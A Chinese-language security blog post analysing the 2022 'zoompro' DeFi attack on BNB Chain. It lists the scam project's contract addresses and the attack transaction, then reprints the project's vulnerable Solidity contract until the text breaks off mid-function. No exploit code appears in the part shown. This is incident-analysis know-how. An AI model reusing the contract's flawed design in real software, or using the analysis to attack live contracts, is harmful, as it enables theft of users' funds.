<!DOCTYPE html>
<html lang="en">

<!-- Head tag -->
<head>

    <meta charset="utf-8"/>
    <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
    <meta name="viewport" content="width=device-width, initial-scale=1"/>

    <!--Description-->

    

    
        <meta name="description" content="简介项目官网：https://zoompro.finance/#/main/swap
从项目官网js文件能看出来此项目大概率是个骗子盘

关键合约假 u: 0x62D51AACb079e882b1cb7877438de485Cba0dD3f
批量转账合约：0x47391071824569F29381"/>
    

    <!--Author-->
    
        <meta name="author" content="d1rrick"/>
    

    <!--Open Graph Title-->
    
        <meta property="og:title" content="zoompro 攻击事件分析与复现"/>
    

    <!--Open Graph Description-->
    
        <meta property="og:description" content="简介项目官网：https://zoompro.finance/#/main/swap
从项目官网js文件能看出来此项目大概率是个骗子盘

关键合约假 u: 0x62D51AACb079e882b1cb7877438de485Cba0dD3f
批量转账合约：0x47391071824569F29381"/>
    

    <!--Open Graph Site Name-->
        <meta property="og:site_name" content="d1rrick&#39;s blog"/>

    <!--Type page-->
    
        <meta property="og:type" content="article"/>
    

    <!--Page Cover-->
    
    
        <meta property="og:image" content="http://example.comimg/home-bg.jpg"/>
    

        <meta name="twitter:card" content="summary_large_image"/>

    

    
        <meta name="twitter:image" content="http://example.comimg/home-bg.jpg"/>
    

    <!-- Title -->
    
    <title>zoompro 攻击事件分析与复现 - d1rrick&#39;s blog</title>

    <!-- Bootstrap Core CSS -->
    <link href="//maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" rel="stylesheet"/>

    <!-- Custom CSS -->
    
<link rel="stylesheet" href="/css/style.css">


    <!-- Custom Fonts -->
    <link href="//maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet" type="text/css"/>
    <link href="//fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic" rel="stylesheet" type="text/css"/>
    <link href="//fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800" rel="stylesheet" type="text/css"/>

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
    <script src="//oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
    <script src="//oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->

    <!-- Gallery -->
    <link href="//cdnjs.cloudflare.com/ajax/libs/featherlight/1.3.5/featherlight.min.css" type="text/css" rel="stylesheet"/>

    <!-- Google Analytics -->
    


    <!-- favicon -->
    

<meta name="generator" content="Hexo 5.4.2"></head>


<body>

    <!-- Menu -->
    <!-- Navigation -->
<nav class="navbar navbar-default navbar-custom navbar-fixed-top">
    <div class="container-fluid">
        <!-- Brand and toggle get grouped for better mobile display -->
        <div class="navbar-header page-scroll">
            <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1">
                <span class="sr-only">Toggle navigation</span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
                <span class="icon-bar"></span>
            </button>
            <a class="navbar-brand" href="/">Configurable Title</a>
        </div>

        <!-- Collect the nav links, forms, and other content for toggling -->
        <div class="collapse navbar-collapse" id="bs-example-navbar-collapse-1">
            <ul class="nav navbar-nav navbar-right">
                
                    <li>
                        <a href="/">
                            
                                Home
                            
                        </a>
                    </li>
                
                    <li>
                        <a href="/archives">
                            
                                Archives
                            
                        </a>
                    </li>
                
                    <li>
                        <a href="/tags">
                            
                                Tags
                            
                        </a>
                    </li>
                
                    <li>
                        <a href="/categories">
                            
                                Categories
                            
                        </a>
                    </li>
                
                    <li>
                        <a target="_blank" rel="noopener" href="https://github.com/klugjo/hexo-theme-clean-blog">
                            
                                <i class="fa fa-github fa-stack-2x"></i>
                            
                        </a>
                    </li>
                
            </ul>
        </div>
        <!-- /.navbar-collapse -->
    </div>
    <!-- /.container -->
</nav>

    <!-- Main Content -->
    <!-- Page Header -->
<!-- Set your background image for this header in your post front-matter: cover -->

<header class="intro-header" style="background-image: url('/img/home-bg.jpg')">
    <div class="container">
        <div class="row">
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                <div class="post-heading">
                    <h1>zoompro 攻击事件分析与复现</h1>
                    
                    <span class="meta">
                        <!-- Date and Author -->
                        
                        
                            2022-09-09
                        
                    </span>
                </div>
            </div>
        </div>
    </div>
</header>

<!-- Post Content -->
<article>
    <div class="container">
        <div class="row">

            <!-- Tags and categories -->
           
                <div class="col-lg-4 col-lg-offset-2 col-md-5 col-md-offset-1 post-tags">
                    
                        


<a href="/tags/区块链安全/">#区块链安全</a>


                    
                </div>
                <div class="col-lg-4 col-md-5 post-categories">
                    
                </div>
            

            <!-- Gallery -->
            

            <!-- Post Main Content -->
            <div class="col-lg-8 col-lg-offset-2 col-md-10 col-md-offset-1">
                <h3 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h3><p>项目官网：<a target="_blank" rel="noopener" href="https://zoompro.finance/#/main/swap">https://zoompro.finance/#/main/swap</a></p>
<p>从项目官网js文件能看出来此项目大概率是个骗子盘</p>
<p><img src="/img/postimg/zoom/image-20220906145821510.png" alt="image-20220906145821510"></p>
<h3 id="关键合约"><a href="#关键合约" class="headerlink" title="关键合约"></a>关键合约</h3><p>假 u: 0x62D51AACb079e882b1cb7877438de485Cba0dD3f</p>
<p>批量转账合约：0x47391071824569F29381DFEaf2f1b47A4004933B</p>
<p>假u和token的池子：0x1c7ecBfc48eD0B34AAd4a9F338050685E66235C5</p>
<p>被黑代币 zoom：0x9CE084C378B3E65A164aeba12015ef3881E0F853</p>
<h3 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h3><p>攻击hash:<a target="_blank" rel="noopener" href="https://bscscan.com/tx/0xe176bd9cfefd40dc03508e91d856bd1fe72ffc1e9260cd63502db68962b4de1a">https://bscscan.com/tx/0xe176bd9cfefd40dc03508e91d856bd1fe72ffc1e9260cd63502db68962b4de1a</a></p>
<p>来看下这个项目在测试网上的合约：</p>
<p><a target="_blank" rel="noopener" href="https://testnet.bscscan.com/address/0x253d3EC210449F6aED6B50E6a7dB40d3Fc89A2E5#code">https://testnet.bscscan.com/address/0x253d3EC210449F6aED6B50E6a7dB40d3Fc89A2E5#code</a></p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br><span class="line">252</span><br><span class="line">253</span><br><span class="line">254</span><br><span class="line">255</span><br><span class="line">256</span><br><span class="line">257</span><br><span class="line">258</span><br><span class="line">259</span><br><span class="line">260</span><br><span class="line">261</span><br><span class="line">262</span><br><span class="line">263</span><br><span class="line">264</span><br><span class="line">265</span><br><span class="line">266</span><br><span class="line">267</span><br><span class="line">268</span><br><span class="line">269</span><br><span class="line">270</span><br><span class="line">271</span><br><span class="line">272</span><br><span class="line">273</span><br><span class="line">274</span><br><span class="line">275</span><br><span class="line">276</span><br><span class="line">277</span><br><span class="line">278</span><br><span class="line">279</span><br><span class="line">280</span><br><span class="line">281</span><br><span class="line">282</span><br><span class="line">283</span><br><span class="line">284</span><br><span class="line">285</span><br><span class="line">286</span><br><span class="line">287</span><br><span class="line">288</span><br><span class="line">289</span><br><span class="line">290</span><br><span class="line">291</span><br><span class="line">292</span><br><span class="line">293</span><br><span class="line">294</span><br><span class="line">295</span><br><span class="line">296</span><br><span class="line">297</span><br><span class="line">298</span><br><span class="line">299</span><br><span class="line">300</span><br><span class="line">301</span><br><span class="line">302</span><br><span class="line">303</span><br><span class="line">304</span><br><span class="line">305</span><br><span class="line">306</span><br><span class="line">307</span><br><span class="line">308</span><br><span class="line">309</span><br><span class="line">310</span><br><span class="line">311</span><br><span class="line">312</span><br><span class="line">313</span><br><span class="line">314</span><br><span class="line">315</span><br><span class="line">316</span><br><span class="line">317</span><br><span class="line">318</span><br><span class="line">319</span><br><span class="line">320</span><br><span class="line">321</span><br><span class="line">322</span><br><span class="line">323</span><br><span class="line">324</span><br><span class="line">325</span><br><span class="line">326</span><br><span class="line">327</span><br><span class="line">328</span><br><span class="line">329</span><br><span class="line">330</span><br><span class="line">331</span><br><span class="line">332</span><br><span class="line">333</span><br><span class="line">334</span><br><span class="line">335</span><br><span class="line">336</span><br><span class="line">337</span><br><span class="line">338</span><br><span class="line">339</span><br><span class="line">340</span><br><span class="line">341</span><br><span class="line">342</span><br><span class="line">343</span><br><span class="line">344</span><br><span class="line">345</span><br><span class="line">346</span><br><span class="line">347</span><br><span class="line">348</span><br><span class="line">349</span><br><span class="line">350</span><br><span class="line">351</span><br><span class="line">352</span><br><span class="line">353</span><br><span class="line">354</span><br><span class="line">355</span><br><span class="line">356</span><br><span class="line">357</span><br><span class="line">358</span><br><span class="line">359</span><br><span class="line">360</span><br><span class="line">361</span><br><span class="line">362</span><br><span class="line">363</span><br><span class="line">364</span><br><span class="line">365</span><br><span class="line">366</span><br><span class="line">367</span><br><span class="line">368</span><br><span class="line">369</span><br><span class="line">370</span><br><span class="line">371</span><br><span class="line">372</span><br><span class="line">373</span><br><span class="line">374</span><br><span class="line">375</span><br><span class="line">376</span><br><span class="line">377</span><br><span class="line">378</span><br><span class="line">379</span><br><span class="line">380</span><br><span class="line">381</span><br><span class="line">382</span><br><span class="line">383</span><br><span class="line">384</span><br><span class="line">385</span><br><span class="line">386</span><br><span class="line">387</span><br><span class="line">388</span><br><span class="line">389</span><br><span class="line">390</span><br><span class="line">391</span><br><span class="line">392</span><br><span class="line">393</span><br><span class="line">394</span><br><span class="line">395</span><br><span class="line">396</span><br><span class="line">397</span><br><span class="line">398</span><br><span class="line">399</span><br><span class="line">400</span><br><span class="line">401</span><br><span class="line">402</span><br><span class="line">403</span><br><span class="line">404</span><br><span class="line">405</span><br><span class="line">406</span><br><span class="line">407</span><br><span class="line">408</span><br><span class="line">409</span><br><span class="line">410</span><br><span class="line">411</span><br><span class="line">412</span><br><span class="line">413</span><br><span class="line">414</span><br><span class="line">415</span><br><span class="line">416</span><br><span class="line">417</span><br><span class="line">418</span><br><span class="line">419</span><br><span class="line">420</span><br><span class="line">421</span><br><span class="line">422</span><br><span class="line">423</span><br><span class="line">424</span><br><span class="line">425</span><br><span class="line">426</span><br><span class="line">427</span><br><span class="line">428</span><br><span class="line">429</span><br><span class="line">430</span><br><span class="line">431</span><br><span class="line">432</span><br><span class="line">433</span><br><span class="line">434</span><br><span class="line">435</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// SPDX-License-Identifier: MIT</span></span><br><span class="line">pragma solidity ^<span class="number">0.6</span><span class="number">.12</span>;</span><br><span class="line"></span><br><span class="line">interface relationship &#123;</span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">defultFather</span>(<span class="params"></span>) external returns (address);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">father</span>(<span class="params">address _addr</span>) external view returns (address);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">grandFather</span>(<span class="params">address _addr</span>) external returns (address);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">otherCallSetRelationship</span>(<span class="params">address _son, address _father</span>) external;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">getFather</span>(<span class="params">address _addr</span>) external view returns (address);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">getGrandFather</span>(<span class="params">address _addr</span>) external view returns (address);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">interface <span class="title class_">IERC20</span> &#123;</span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">totalSupply</span>(<span class="params"></span>) external view returns (uint256);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">balanceOf</span>(<span class="params">address account</span>) external view returns (uint256);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">transfer</span>(<span class="params">address recipient, uint256 amount</span>) external returns (bool);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">allowance</span>(<span class="params">address owner, address spender</span>) external view returns (uint256);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">approve</span>(<span class="params">address spender, uint256 amount</span>) external returns (bool);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">transferFrom</span>(<span class="params">address sender, address recipient, uint256 amount</span>) external returns (bool);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">mint</span>(<span class="params">uint256 amount</span>) external returns (bool);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">transferOwnership</span>(<span class="params">address newOwner</span>) external;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">interface <span class="title class_">IdexRouter02</span> &#123;</span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">addLiquidity</span>(<span class="params"></span></span><br><span class="line"><span class="params">        address tokenA,</span></span><br><span class="line"><span class="params">        address tokenB,</span></span><br><span class="line"><span class="params">        uint amountADesired,</span></span><br><span class="line"><span class="params">        uint amountBDesired,</span></span><br><span class="line"><span class="params">        uint amountAMin,</span></span><br><span class="line"><span class="params">        uint amountBMin,</span></span><br><span class="line"><span class="params">        address to,</span></span><br><span class="line"><span class="params">        uint deadline</span></span><br><span class="line"><span class="params">    </span>) external returns (uint amountA, uint amountB, uint liquidity);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">removeLiquidity</span>(<span class="params"></span></span><br><span class="line"><span class="params">        address tokenA,</span></span><br><span class="line"><span class="params">        address tokenB,</span></span><br><span class="line"><span class="params">        uint liquidity,</span></span><br><span class="line"><span class="params">        uint amountAMin,</span></span><br><span class="line"><span class="params">        uint amountBMin,</span></span><br><span class="line"><span class="params">        address to,</span></span><br><span class="line"><span class="params">        uint deadline</span></span><br><span class="line"><span class="params">    </span>) external returns (uint amountA, uint amountB);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">swapExactTokensForTokens</span>(<span class="params"></span></span><br><span class="line"><span class="params">        uint amountIn,</span></span><br><span class="line"><span class="params">        uint amountOutMin,</span></span><br><span class="line"><span class="params">        address[] calldata path,</span></span><br><span class="line"><span class="params">        address to,</span></span><br><span class="line"><span class="params">        uint deadline</span></span><br><span class="line"><span class="params">    </span>) external returns (uint[] memory amounts);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">getAmountsOut</span>(<span class="params">uint amountIn, address[] memory path</span>)</span><br><span class="line">    external view</span><br><span class="line">    returns (uint[] memory amounts);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">interface <span class="title class_">IusdtZhen</span> &#123;</span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">walletAGate</span>(<span class="params"></span>) external view returns (uint256);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">walletBGate</span>(<span class="params"></span>) external view returns (uint256);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">fatherGate</span>(<span class="params"></span>) external view returns (uint256);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">grandFatherGate</span>(<span class="params"></span>) external view returns (uint256);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">brunGate</span>(<span class="params"></span>) external view returns (uint256);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">getPair</span>(<span class="params">address tokenA, address tokenB</span>) external view returns (address pair);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">contract <span class="title class_">Ownable</span> &#123;</span><br><span class="line">    address private _owner;</span><br><span class="line"></span><br><span class="line">    event <span class="title class_">OwnershipTransferred</span>(address indexed previousOwner, address indexed newOwner);</span><br><span class="line"></span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@dev</span> Initializes the contract setting the deployer as the initial owner.</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="title function_">constructor</span> () public &#123;</span><br><span class="line">        address msgSender = msg.<span class="property">sender</span>;</span><br><span class="line">        _owner = msgSender;</span><br><span class="line">        emit <span class="title class_">OwnershipTransferred</span>(<span class="title function_">address</span>(<span class="number">0</span>), msgSender);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@dev</span> Returns the address of the current owner.</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">owner</span>(<span class="params"></span>) public view returns (address) &#123;</span><br><span class="line">        <span class="keyword">return</span> _owner;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@dev</span> Throws if called by any account other than the owner.</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    modifier <span class="title function_">onlyOwner</span>(<span class="params"></span>) &#123;</span><br><span class="line">        <span class="built_in">require</span>(<span class="title function_">owner</span>() == msg.<span class="property">sender</span>, <span class="string">&quot;Ownable: caller is not the owner&quot;</span>);</span><br><span class="line">        _;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@dev</span> Leaves the contract without owner. It will not be possible to call</span></span><br><span class="line"><span class="comment">     * `onlyOwner` functions anymore. Can only be called by the current owner.</span></span><br><span class="line"><span class="comment">     *</span></span><br><span class="line"><span class="comment">     * <span class="doctag">NOTE:</span> Renouncing ownership will leave the contract without an owner,</span></span><br><span class="line"><span class="comment">     * thereby removing any functionality that is only available to the owner.</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">renounceOwnership</span>(<span class="params"></span>) public onlyOwner &#123;</span><br><span class="line">        emit <span class="title class_">OwnershipTransferred</span>(_owner, <span class="title function_">address</span>(<span class="number">0</span>));</span><br><span class="line">        _owner = <span class="title function_">address</span>(<span class="number">0</span>);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">/**</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@dev</span> Transfers ownership of the contract to a new account (`newOwner`).</span></span><br><span class="line"><span class="comment">     * Can only be called by the current owner.</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">transferOwnership</span>(<span class="params">address newOwner</span>) public onlyOwner &#123;</span><br><span class="line">        <span class="built_in">require</span>(newOwner != <span class="title function_">address</span>(<span class="number">0</span>), <span class="string">&quot;Ownable: new owner is the zero address&quot;</span>);</span><br><span class="line">        emit <span class="title class_">OwnershipTransferred</span>(_owner, newOwner);</span><br><span class="line">        _owner = newOwner;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">contract <span class="title class_">AntiSwap</span> is <span class="title class_">Ownable</span> &#123;</span><br><span class="line"></span><br><span class="line">    address public usdtZhen;</span><br><span class="line">    address public usdtJia;</span><br><span class="line">    address public anti;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//假u和token的lp</span></span><br><span class="line">    address public pair;</span><br><span class="line">    <span class="comment">//真u和假u的lp</span></span><br><span class="line">    address public pair2;</span><br><span class="line">    address public defaultAdd; <span class="comment">//断代后接收手续费的默认地址</span></span><br><span class="line">    relationship public <span class="variable constant_">RP</span>;</span><br><span class="line"></span><br><span class="line">    address public fundPoolAdd; <span class="comment">//基金池收取手续费比率</span></span><br><span class="line">    uint256 public fundPoolRate; <span class="comment">//基金池收取手续费比率</span></span><br><span class="line">    uint256 public sixGenSumRate; <span class="comment">//六代比率,总的,扩大10倍</span></span><br><span class="line">    uint256[] public sixGenRate; <span class="comment">//六代比率,每层,扩大100倍</span></span><br><span class="line"></span><br><span class="line">    <span class="title class_">IdexRouter02</span> router02 = <span class="title class_">IdexRouter02</span>(<span class="number">0x10ED43C718714eb63d5aA57B78B54704E256024E</span>);</span><br><span class="line">    event <span class="title class_">Transfer</span>(address indexed <span class="keyword">from</span>, address indexed to, uint256 value);</span><br><span class="line">    <span class="title function_">mapping</span>(<span class="function"><span class="params">address</span> =&gt;</span> bool) public writeList;</span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">setWhiteListBat</span>(<span class="params">address[] calldata _addr, uint256 _type, bool _YorN</span>) external onlyOwner &#123;<span class="keyword">for</span> (uint256 i = <span class="number">0</span>; i &lt; _addr.<span class="property">length</span>; i++) &#123;writeList[_addr[i]] = _YorN;&#125;&#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">init</span>(<span class="params">address _usdtZhen, address _usdtJia, address _anti, address _router02, address _pair, address _pair2,</span></span><br><span class="line"><span class="params">        address _defaultAdd, address _RP,address _fundPoolAdd, uint256 _fundPoolRate, uint256[] memory _sixGenRate</span>) public <span class="title function_">onlyOwner</span>(<span class="params"></span>) &#123;</span><br><span class="line"></span><br><span class="line">        usdtZhen = _usdtZhen;</span><br><span class="line">        usdtJia = _usdtJia;</span><br><span class="line">        anti = _anti;</span><br><span class="line">        router02 = <span class="title class_">IdexRouter02</span>(_router02);</span><br><span class="line">        pair = _pair;</span><br><span class="line">        pair2 = _pair2;</span><br><span class="line">        defaultAdd = _defaultAdd;</span><br><span class="line">        <span class="variable constant_">RP</span> = <span class="title function_">relationship</span>(_RP);</span><br><span class="line"></span><br><span class="line">        <span class="comment">//手续费有收小数，所以注意设置上去时，要扩大十倍，不然到时候也gg了</span></span><br><span class="line">        fundPoolAdd = _fundPoolAdd;</span><br><span class="line">        fundPoolRate = _fundPoolRate;</span><br><span class="line">        sixGenSumRate = <span class="number">0</span>;</span><br><span class="line">        sixGenRate = _sixGenRate;</span><br><span class="line">        <span class="keyword">for</span> (uint256 i = <span class="number">0</span>; i &lt; sixGenRate.<span class="property">length</span>; i++) sixGenSumRate = sixGenSumRate + sixGenRate[i];</span><br><span class="line"></span><br><span class="line">        <span class="title class_">IERC20</span>(usdtZhen).<span class="title function_">approve</span>(<span class="title function_">address</span>(router02), <span class="title function_">uint256</span>(- <span class="number">1</span>));</span><br><span class="line">        <span class="title class_">IERC20</span>(usdtJia).<span class="title function_">approve</span>(<span class="title function_">address</span>(router02), <span class="title function_">uint256</span>(- <span class="number">1</span>));</span><br><span class="line">        <span class="title class_">IERC20</span>(anti).<span class="title function_">approve</span>(<span class="title function_">address</span>(router02), <span class="title function_">uint256</span>(- <span class="number">1</span>));</span><br><span class="line">        <span class="title class_">IERC20</span>(pair).<span class="title function_">approve</span>(<span class="title function_">address</span>(router02), <span class="title function_">uint256</span>(- <span class="number">1</span>));</span><br><span class="line">        <span class="title class_">IERC20</span>(pair2).<span class="title function_">approve</span>(<span class="title function_">address</span>(router02), <span class="title function_">uint256</span>(- <span class="number">1</span>));</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// ******************************************************</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">//这里至下往上，逐级层级分润，详细见业务</span></span><br><span class="line">    <span class="keyword">function</span> <span class="title function_">rpSixAwardPub</span>(<span class="params">uint256 _amount, address _to</span>) internal returns (uint256)&#123;</span><br><span class="line">        uint256 _trueAmount = _amount * (<span class="number">100000</span> - (sixGenSumRate + fundPoolRate)) / <span class="number">100000</span>; <span class="comment">//算出来应获得，注意比率都扩大了十倍，都是浮点的锅</span></span><br><span class="line">        <span class="keyword">if</span>(_to != <span class="title function_">address</span>(<span class="number">0</span>)) &#123;</span><br><span class="line">            <span class="title function_">rpSixAward</span>(_to, _amount); <span class="comment">//层级吃吃吃吃吃吃</span></span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            _trueAmount = _amount * (<span class="number">100000</span> - (fundPoolRate)) / <span class="number">100000</span>; <span class="comment">//算出来应获得，注意比率都扩大了十倍，都是浮点的锅   </span></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="title class_">IERC20</span>(anti).<span class="title function_">transfer</span>(fundPoolAdd, _amount * fundPoolRate / <span class="number">100000</span>);<span class="comment">//基金池马走日</span></span><br><span class="line">        <span class="keyword">return</span> 